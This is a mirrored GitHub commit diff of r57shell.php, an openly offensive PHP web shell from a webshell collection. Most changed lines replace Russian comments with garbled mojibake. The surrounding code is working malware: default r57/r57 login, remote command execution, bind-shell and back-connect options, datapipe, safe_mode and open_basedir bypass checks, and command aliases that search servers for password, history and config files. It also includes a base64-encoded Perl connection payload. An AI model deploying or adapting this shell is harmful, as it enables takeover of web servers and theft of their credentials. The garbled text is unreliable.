mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
parent
104adac40f
commit
e0d39713dd
1 changed files with 141 additions and 159 deletions
|
@ -22,15 +22,15 @@
|
||||||
/*
|
/*
|
||||||
/*
|
/*
|
||||||
/*
|
/*
|
||||||
/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер
|
/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
|
||||||
/* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru
|
/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
|
||||||
/* Версия: 1.22
|
/* Âåðñèÿ: 1.22
|
||||||
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
|
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
|
||||||
/* (c)oded by 1dt.w0lf
|
/* (c)oded by 1dt.w0lf
|
||||||
/* RST/GHC http://rst.void.ru , http://ghc.ru
|
/* RST/GHC http://rst.void.ru , http://ghc.ru
|
||||||
/******************************************************************************************************/
|
/******************************************************************************************************/
|
||||||
|
|
||||||
/* ~~~ Настройки ~~~ */
|
/* ~~~ Íàñòðîéêè ~~~ */
|
||||||
error_reporting(0);
|
error_reporting(0);
|
||||||
set_magic_quotes_runtime(0);
|
set_magic_quotes_runtime(0);
|
||||||
@set_time_limit(0);
|
@set_time_limit(0);
|
||||||
|
@ -56,12 +56,12 @@ if (@get_magic_quotes_gpc())
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/* ~~~ Аутентификация ~~~ */
|
/* ~~~ Àóòåíòèôèêàöèÿ ~~~ */
|
||||||
|
|
||||||
// Логин и пароль для доступа к скрипту
|
// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
|
||||||
// НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!!
|
// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
|
||||||
$name="r57"; // логин пользователя
|
$name="r57"; // ëîãèí ïîëüçîâàòåëÿ
|
||||||
$pass="r57"; // пароль пользователя
|
$pass="r57"; // ïàðîëü ïîëüçîâàòåëÿ
|
||||||
|
|
||||||
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
|
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
|
||||||
{
|
{
|
||||||
|
@ -69,7 +69,7 @@ if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_S
|
||||||
header("HTTP/1.0 401 Unauthorized");
|
header("HTTP/1.0 401 Unauthorized");
|
||||||
exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
|
exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
|
||||||
}
|
}
|
||||||
$head = '<!-- Здравствуй Вася -->
|
$head = '<!-- Çäðàâñòâóé Âàñÿ -->
|
||||||
<html>
|
<html>
|
||||||
<head>
|
<head>
|
||||||
<title>r57shell</title>
|
<title>r57shell</title>
|
||||||
|
@ -250,101 +250,101 @@ if(isset($_GET['mem']))
|
||||||
}
|
}
|
||||||
|
|
||||||
/*
|
/*
|
||||||
Выбор языка
|
Âûáîð ÿçûêà
|
||||||
$language='ru' - русский
|
$language='ru' - ðóññêèé
|
||||||
$language='eng' - английский
|
$language='eng' - àíãëèéñêèé
|
||||||
*/
|
*/
|
||||||
$language='ru';
|
$language='ru';
|
||||||
|
|
||||||
$lang=array(
|
$lang=array(
|
||||||
'ru_text1' =>'Выполненная команда',
|
'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
|
||||||
'ru_text2' =>'Выполнение команд на сервере',
|
'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
|
||||||
'ru_text3' =>'Выполнить команду',
|
'ru_text3' =>'Âûïîëíèòü êîìàíäó',
|
||||||
'ru_text4' =>'Рабочая директория',
|
'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ',
|
||||||
'ru_text5' =>'Загрузка файлов на сервер',
|
'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
|
||||||
'ru_text6' =>'Локальный файл',
|
'ru_text6' =>'Ëîêàëüíûé ôàéë',
|
||||||
'ru_text7' =>'Алиасы',
|
'ru_text7' =>'Àëèàñû',
|
||||||
'ru_text8' =>'Выберите алиас',
|
'ru_text8' =>'Âûáåðèòå àëèàñ',
|
||||||
'ru_butt1' =>'Выполнить',
|
'ru_butt1' =>'Âûïîëíèòü',
|
||||||
'ru_butt2' =>'Загрузить',
|
'ru_butt2' =>'Çàãðóçèòü',
|
||||||
'ru_text9' =>'Открытие порта и привязка его к /bin/bash',
|
'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
|
||||||
'ru_text10'=>'Открыть порт',
|
'ru_text10'=>'Îòêðûòü ïîðò',
|
||||||
'ru_text11'=>'Пароль для доступа',
|
'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà',
|
||||||
'ru_butt3' =>'Открыть',
|
'ru_butt3' =>'Îòêðûòü',
|
||||||
'ru_text12'=>'back-connect',
|
'ru_text12'=>'back-connect',
|
||||||
'ru_text13'=>'IP-адрес',
|
'ru_text13'=>'IP-àäðåñ',
|
||||||
'ru_text14'=>'Порт',
|
'ru_text14'=>'Ïîðò',
|
||||||
'ru_butt4' =>'Выполнить',
|
'ru_butt4' =>'Âûïîëíèòü',
|
||||||
'ru_text15'=>'Загрузка файлов с удаленного сервера',
|
'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
|
||||||
'ru_text16'=>'Использовать',
|
'ru_text16'=>'Èñïîëüçîâàòü',
|
||||||
'ru_text17'=>'Удаленный файл',
|
'ru_text17'=>'Óäàëåííûé ôàéë',
|
||||||
'ru_text18'=>'Локальный файл',
|
'ru_text18'=>'Ëîêàëüíûé ôàéë',
|
||||||
'ru_text19'=>'Exploits',
|
'ru_text19'=>'Exploits',
|
||||||
'ru_text20'=>'Использовать',
|
'ru_text20'=>'Èñïîëüçîâàòü',
|
||||||
'ru_text21'=>'Новое имя',
|
'ru_text21'=>'Íîâîå èìÿ',
|
||||||
'ru_text22'=>'datapipe',
|
'ru_text22'=>'datapipe',
|
||||||
'ru_text23'=>'Локальный порт',
|
'ru_text23'=>'Ëîêàëüíûé ïîðò',
|
||||||
'ru_text24'=>'Удаленный хост',
|
'ru_text24'=>'Óäàëåííûé õîñò',
|
||||||
'ru_text25'=>'Удаленный порт',
|
'ru_text25'=>'Óäàëåííûé ïîðò',
|
||||||
'ru_text26'=>'Использовать',
|
'ru_text26'=>'Èñïîëüçîâàòü',
|
||||||
'ru_butt5' =>'Запустить',
|
'ru_butt5' =>'Çàïóñòèòü',
|
||||||
'ru_text28'=>'Работа в safe_mode',
|
'ru_text28'=>'Ðàáîòà â safe_mode',
|
||||||
'ru_text29'=>'Доступ запрещен',
|
'ru_text29'=>'Äîñòóï çàïðåùåí',
|
||||||
'ru_butt6' =>'Сменить',
|
'ru_butt6' =>'Ñìåíèòü',
|
||||||
'ru_text30'=>'Просмотр файла',
|
'ru_text30'=>'Ïðîñìîòð ôàéëà',
|
||||||
'ru_butt7' =>'Вывести',
|
'ru_butt7' =>'Âûâåñòè',
|
||||||
'ru_text31'=>'Файл не найден',
|
'ru_text31'=>'Ôàéë íå íàéäåí',
|
||||||
'ru_text32'=>'Выполнение PHP кода',
|
'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
|
||||||
'ru_text33'=>'Проверка возможности обхода ограничений open_basedir через функции cURL',
|
'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL',
|
||||||
'ru_butt8' =>'Проверить',
|
'ru_butt8' =>'Ïðîâåðèòü',
|
||||||
'ru_text34'=>'Проверка возможности обхода ограничений safe_mode через функцию include',
|
'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include',
|
||||||
'ru_text35'=>'Проверка возможности обхода ограничений safe_mode через загрузку файла в mysql',
|
'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql',
|
||||||
'ru_text36'=>' База',
|
'ru_text36'=>' Áàçà',
|
||||||
'ru_text37'=>'Логин',
|
'ru_text37'=>'Ëîãèí',
|
||||||
'ru_text38'=>'Пароль ',
|
'ru_text38'=>'Ïàðîëü ',
|
||||||
'ru_text39'=>'Таблица',
|
'ru_text39'=>'Òàáëèöà',
|
||||||
'ru_text40'=>'Дамп таблицы mysql сервера',
|
'ru_text40'=>'Äàìï òàáëèöû mysql ñåðâåðà',
|
||||||
'ru_butt9' =>'Дамп',
|
'ru_butt9' =>'Äàìï',
|
||||||
'ru_text41'=>'Сохранить дамп в файле',
|
'ru_text41'=>'Ñîõðàíèòü äàìï â ôàéëå',
|
||||||
'ru_text42'=>'Редактирование файла',
|
'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà',
|
||||||
'ru_text43'=>'Редактировать файл',
|
'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë',
|
||||||
'ru_butt10'=>'Сохранить',
|
'ru_butt10'=>'Ñîõðàíèòü',
|
||||||
'ru_butt11'=>'Редактировать',
|
'ru_butt11'=>'Ðåäàêòèðîâàòü',
|
||||||
'ru_text44'=>'Редактирование файла невозможно! Доступ только для чтения!',
|
'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
|
||||||
'ru_text45'=>'Файл сохранен',
|
'ru_text45'=>'Ôàéë ñîõðàíåí',
|
||||||
'ru_text46'=>'Просмотр phpinfo()',
|
'ru_text46'=>'Ïðîñìîòð phpinfo()',
|
||||||
'ru_text47'=>'Просмотр настроек php.ini',
|
'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini',
|
||||||
'ru_text48'=>'Удаление временных файлов',
|
'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ',
|
||||||
'ru_text49'=>'Удаление скрипта с сервера',
|
'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà',
|
||||||
'ru_text50'=>'Информация о процессоре',
|
'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå',
|
||||||
'ru_text51'=>'Информация о памяти',
|
'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè',
|
||||||
'ru_text52'=>'Текст для поиска',
|
'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
|
||||||
'ru_text53'=>'Искать в папке',
|
'ru_text53'=>'Èñêàòü â ïàïêå',
|
||||||
'ru_text54'=>'Поиск текста в файлах',
|
'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
|
||||||
'ru_butt12'=>'Найти',
|
'ru_butt12'=>'Íàéòè',
|
||||||
'ru_text55'=>'Только в файлах',
|
'ru_text55'=>'Òîëüêî â ôàéëàõ',
|
||||||
'ru_text56'=>'Ничего не найдено',
|
'ru_text56'=>'Íè÷åãî íå íàéäåíî',
|
||||||
'ru_text57'=>'Создать/Удалить Файл/Директорию',
|
'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ',
|
||||||
'ru_text58'=>'Имя',
|
'ru_text58'=>'Èìÿ',
|
||||||
'ru_text59'=>'Файл',
|
'ru_text59'=>'Ôàéë',
|
||||||
'ru_text60'=>'Директорию',
|
'ru_text60'=>'Äèðåêòîðèþ',
|
||||||
'ru_butt13'=>'Создать/Удалить',
|
'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
|
||||||
'ru_text61'=>'Файл создан',
|
'ru_text61'=>'Ôàéë ñîçäàí',
|
||||||
'ru_text62'=>'Директория создана',
|
'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà',
|
||||||
'ru_text63'=>'Файл удален',
|
'ru_text63'=>'Ôàéë óäàëåí',
|
||||||
'ru_text64'=>'Директория удалена',
|
'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà',
|
||||||
'ru_text65'=>'Создать',
|
'ru_text65'=>'Ñîçäàòü',
|
||||||
'ru_text66'=>'Удалить',
|
'ru_text66'=>'Óäàëèòü',
|
||||||
'ru_text67'=>'Chown/Chgrp/Chmod',
|
'ru_text67'=>'Chown/Chgrp/Chmod',
|
||||||
'ru_text68'=>'Команда',
|
'ru_text68'=>'Êîìàíäà',
|
||||||
'ru_text69'=>'Параметр1',
|
'ru_text69'=>'Ïàðàìåòð1',
|
||||||
'ru_text70'=>'Параметр2',
|
'ru_text70'=>'Ïàðàìåòð2',
|
||||||
'ru_text71'=>"Второй параметр команды:\r\n- для CHOWN - имя нового пользователя или его UID (числом) \r\n- для команды CHGRP - имя группы или GID (числом) \r\n- для команды CHMOD - целое число в восьмеричном представлении (например 0777)",
|
'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)",
|
||||||
'ru_text72'=>'Текст для поиска',
|
'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
|
||||||
'ru_text73'=>'Искать в папке',
|
'ru_text73'=>'Èñêàòü â ïàïêå',
|
||||||
'ru_text74'=>'Искать в файлах',
|
'ru_text74'=>'Èñêàòü â ôàéëàõ',
|
||||||
'ru_text75'=>'* можно использовать регулярное выражение',
|
'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå',
|
||||||
'ru_text76'=>'Поиск текста в файлах с помощью утилиты find',
|
'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find',
|
||||||
/* --------------------------------------------------------------- */
|
/* --------------------------------------------------------------- */
|
||||||
'eng_text1' =>'Executed command',
|
'eng_text1' =>'Executed command',
|
||||||
'eng_text2' =>'Execute command on server',
|
'eng_text2' =>'Execute command on server',
|
||||||
|
@ -437,59 +437,59 @@ $lang=array(
|
||||||
);
|
);
|
||||||
|
|
||||||
/*
|
/*
|
||||||
Алиасы команд
|
Àëèàñû êîìàíä
|
||||||
Позволяют избежать многократного набора одних и тех-же команд. ( Сделано благодаря моей природной лени )
|
Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
|
||||||
Вы можете сами добавлять или изменять команды.
|
Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
|
||||||
*/
|
*/
|
||||||
|
|
||||||
$aliases=array(
|
$aliases=array(
|
||||||
/* поиск на сервере всех файлов с suid битом */
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
|
||||||
'find suid files'=>'find / -type f -perm -04000 -ls',
|
'find suid files'=>'find / -type f -perm -04000 -ls',
|
||||||
/* поиск в текущей директории всех файлов с suid битом */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */
|
||||||
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
|
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
|
||||||
/* поиск на сервере всех файлов с sgid битом */
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
|
||||||
'find sgid files'=>'find / -type f -perm -02000 -ls',
|
'find sgid files'=>'find / -type f -perm -02000 -ls',
|
||||||
/* поиск в текущей директории всех файлов с sgid битом */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */
|
||||||
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
|
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
|
||||||
/* поиск на сервере файлов config.inc.php */
|
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
|
||||||
'find config.inc.php files'=>'find / -type f -name config.inc.php',
|
'find config.inc.php files'=>'find / -type f -name config.inc.php',
|
||||||
/* поиск в тек дире config.inc.php */
|
/* ïîèñê â òåê äèðå config.inc.php */
|
||||||
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
|
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
|
||||||
/* поиск на сервере файлов config* */
|
/* ïîèñê íà ñåðâåðå ôàéëîâ config* */
|
||||||
'find config* files'=>'find / -type f -name "config*"',
|
'find config* files'=>'find / -type f -name "config*"',
|
||||||
/* поиск в текущей директории файлов config* */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */
|
||||||
'find config* files in current dir'=>'find . -type f -name "config*"',
|
'find config* files in current dir'=>'find . -type f -name "config*"',
|
||||||
/* поиск на сервере всех файлов доступных на запись для всех */
|
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||||
'find all writable files'=>'find / -type f -perm -2 -ls',
|
'find all writable files'=>'find / -type f -perm -2 -ls',
|
||||||
/* поиск в текущей директории всех файлов доступных на запись для всех */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||||
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
|
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
|
||||||
/* поиск на сервере всех директорий доступных на запись для всех */
|
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||||
'find all writable directories'=>'find / -type d -perm -2 -ls',
|
'find all writable directories'=>'find / -type d -perm -2 -ls',
|
||||||
/* поиск в текущей директории всех директорий доступных на запись для всех */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||||
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
|
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
|
||||||
/* поиск на сервере всех директорий и файлов доступных на запись для всех */
|
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||||
'find all writable directories and files'=>'find / -perm -2 -ls',
|
'find all writable directories and files'=>'find / -perm -2 -ls',
|
||||||
/* поиск в текущей директории всех директорий и файлов доступных на запись для всех */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
|
||||||
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
|
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
|
||||||
/* поиск на сервере файлов service.pwd ... frontpage =))) */
|
/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */
|
||||||
'find all service.pwd files'=>'find / -type f -name service.pwd',
|
'find all service.pwd files'=>'find / -type f -name service.pwd',
|
||||||
/* поиск в текущей директории файлов service.pwd */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */
|
||||||
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
|
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
|
||||||
/* поиск на сервере файлов .htpasswd */
|
/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */
|
||||||
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
|
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
|
||||||
/* поиск в текущей директории файлов .htpasswd */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */
|
||||||
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
|
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
|
||||||
/* поиск всех файлов .bash_history */
|
/* ïîèñê âñåõ ôàéëîâ .bash_history */
|
||||||
'find all .bash_history files'=>'find / -type f -name .bash_history',
|
'find all .bash_history files'=>'find / -type f -name .bash_history',
|
||||||
/* поиск в текущей директории файлов .bash_history */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */
|
||||||
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
|
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
|
||||||
/* поиск всех файлов .fetchmailrc */
|
/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */
|
||||||
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
|
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
|
||||||
/* поиск в текущей директории файлов .fetchmailrc */
|
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */
|
||||||
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
|
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
|
||||||
/* вывод списка атрибутов файлов на файловой системе ext2fs */
|
/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */
|
||||||
'list file attributes on a Linux second extended file system'=>'lsattr -va',
|
'list file attributes on a Linux second extended file system'=>'lsattr -va',
|
||||||
/* просмотр открытых портов */
|
/* ïðîñìîòð îòêðûòûõ ïîðòîâ */
|
||||||
'show opened ports'=>'netstat -an | grep -i listen',
|
'show opened ports'=>'netstat -an | grep -i listen',
|
||||||
'----------------------------------------------------------------------------------------------------'=>'ls -la'
|
'----------------------------------------------------------------------------------------------------'=>'ls -la'
|
||||||
);
|
);
|
||||||
|
@ -499,7 +499,7 @@ $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=
|
||||||
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
|
$table_up2 = " ::</div></b></font></td></tr><tr><td>";
|
||||||
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
|
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
|
||||||
$table_end1 = "</td></tr>";
|
$table_end1 = "</td></tr>";
|
||||||
$arrow = " <font face=Wingdings color=gray>и</font>";
|
$arrow = " <font face=Wingdings color=gray>è</font>";
|
||||||
$lb = "<font color=black>[</font>";
|
$lb = "<font color=black>[</font>";
|
||||||
$rb = "<font color=black>]</font>";
|
$rb = "<font color=black>]</font>";
|
||||||
$font = "<font face=Verdana size=-2>";
|
$font = "<font face=Verdana size=-2>";
|
||||||
|
@ -513,10 +513,10 @@ $windows = 0;
|
||||||
$unix = 0;
|
$unix = 0;
|
||||||
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
|
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
|
||||||
if(empty($dir))
|
if(empty($dir))
|
||||||
{ // на случай если не удалось получить директорию
|
{ // íà ñëó÷àé åñëè íå óäàëîñü ïîëó÷èòü äèðåêòîðèþ
|
||||||
$os = getenv('OS');
|
$os = getenv('OS');
|
||||||
if(empty($os)){ $os = php_uname(); } // пробуем получить через php_uname()
|
if(empty($os)){ $os = php_uname(); } // ïðîáóåì ïîëó÷èòü ÷åðåç php_uname()
|
||||||
if(empty($os)){ $os ="-"; $unix=1; } // если ничего не получилось то будет unix =)
|
if(empty($os)){ $os ="-"; $unix=1; } // åñëè íè÷åãî íå ïîëó÷èëîñü òî áóäåò unix =)
|
||||||
else
|
else
|
||||||
{
|
{
|
||||||
if(@eregi("^win",$os)) { $windows = 1; }
|
if(@eregi("^win",$os)) { $windows = 1; }
|
||||||
|
@ -565,9 +565,9 @@ if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd'])
|
||||||
die(); // show founded strings and die
|
die(); // show founded strings and die
|
||||||
}
|
}
|
||||||
|
|
||||||
/* Проверка того можем ли мы выполнять команды при выключенном safe_mode. Если нет то считаем что сейф включен */
|
/* Ïðîâåðêà òîãî ìîæåì ëè ìû âûïîëíÿòü êîìàíäû ïðè âûêëþ÷åííîì safe_mode. Åñëè íåò òî ñ÷èòàåì ÷òî ñåéô âêëþ÷åí */
|
||||||
/* Обходит невозможность выполнения команд на винде когда сейф выключен но cmd.exe переименован */
|
/* Îáõîäèò íåâîçìîæíîñòü âûïîëíåíèÿ êîìàíä íà âèíäå êîãäà ñåéô âûêëþ÷åí íî cmd.exe ïåðåèìåíîâàí */
|
||||||
/* либо когда в php.ini прописаны disable_functions */
|
/* ëèáî êîãäà â php.ini ïðîïèñàíû disable_functions */
|
||||||
if($windows&&!$safe_mode)
|
if($windows&&!$safe_mode)
|
||||||
{
|
{
|
||||||
$uname = ex("ver");
|
$uname = ex("ver");
|
||||||
|
@ -632,7 +632,7 @@ function ex($cfe)
|
||||||
/* write error */
|
/* write error */
|
||||||
function we($i)
|
function we($i)
|
||||||
{
|
{
|
||||||
if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу записать в файл '; }
|
if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; }
|
||||||
else { $text = "[-] ERROR! Can't write in file "; }
|
else { $text = "[-] ERROR! Can't write in file "; }
|
||||||
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
||||||
}
|
}
|
||||||
|
@ -640,7 +640,7 @@ echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><fon
|
||||||
/* read error */
|
/* read error */
|
||||||
function re($i)
|
function re($i)
|
||||||
{
|
{
|
||||||
if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу прочитать файл '; }
|
if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; }
|
||||||
else { $text = "[-] ERROR! Can't read file "; }
|
else { $text = "[-] ERROR! Can't read file "; }
|
||||||
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
||||||
}
|
}
|
||||||
|
@ -648,7 +648,7 @@ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgco
|
||||||
/* create error */
|
/* create error */
|
||||||
function ce($i)
|
function ce($i)
|
||||||
{
|
{
|
||||||
if($GLOBALS['language']=="ru"){ $text = "Не удалось создать "; }
|
if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; }
|
||||||
else { $text = "Can't create "; }
|
else { $text = "Can't create "; }
|
||||||
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
|
||||||
}
|
}
|
||||||
|
@ -1022,25 +1022,7 @@ DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSU
|
||||||
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
|
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
|
||||||
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
|
